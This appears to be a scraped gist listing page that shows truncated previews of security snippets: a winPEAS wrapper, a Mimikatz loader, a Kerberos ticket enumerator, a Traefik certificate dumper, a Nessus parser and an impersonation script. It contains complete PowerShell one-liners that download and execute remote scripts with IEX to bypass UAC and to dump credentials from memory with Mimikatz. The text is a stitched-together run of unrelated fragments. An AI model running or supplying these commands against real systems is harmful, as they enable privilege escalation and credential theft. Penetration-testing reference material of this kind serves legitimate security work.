[email protected] / @JonTheNiceGuy / @g7vri
- Introduction
function Invoke-winPEAS | |
{ | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, Mandatory = $true)] | |
[ValidateNotNullorEmpty()] | |
[String] | |
$Command | |
) |
#requires -version 2 | |
<# | |
Author: Noah | |
@subTee's reflexive loader | |
Required Dependencies: msbuild, csc | |
Execute: Run-UpdateKatz -Verbose |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
function Get-KerberosTicketGrantingTicket | |
{ | |
<# | |
.SYNOPSIS | |
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
.DESCRIPTION | |
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
#!/usr/bin/env python | |
import argparse | |
import base64 | |
import json | |
import os | |
def main(): | |
parser = argparse.ArgumentParser( | |
description="Dump all certificates out of Traefik's acme.json file") |
#! /usr/bin/env python3.2 | |
import xml.etree.ElementTree as etree | |
import shutil | |
import os | |
first = 1 | |
for fileName in os.listdir("."): | |
if ".nessus" in fileName: | |
print(":: Parsing", fileName) |
param( [ScriptBlock] $scriptBlock ) | |
<# | |
.SYNOPSIS | |
Impersonates a user and executes a script block as that user. This is an interactive script | |
and a window will open in order to securely capture credentials. | |
.EXAMPLE | |
Use-Impersonation.ps1 {Get-ChildItem 'C:\' | Foreach { Write-Host $_.Name }} | |
This writes the contents of 'C:\' impersonating the user that is entered. | |
#> | |